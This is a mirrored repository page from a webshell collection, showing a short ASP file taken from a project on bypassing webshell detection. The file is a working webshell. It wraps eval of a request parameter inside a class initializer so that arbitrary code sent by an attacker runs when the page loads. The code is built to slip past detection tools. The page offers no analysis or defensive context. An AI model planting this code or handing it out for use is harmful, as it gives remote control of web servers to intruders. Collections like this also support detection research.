mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
7451dc532b
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp author: Build By LandGrey
9 lines
No EOL
132 B
Text
9 lines
No EOL
132 B
Text
<%
|
|
Class LandGrey
|
|
Private Sub Class_Initialize
|
|
eval (request("LandGrey"))
|
|
End Sub
|
|
End Class
|
|
|
|
Set X = New LandGrey
|
|
%> |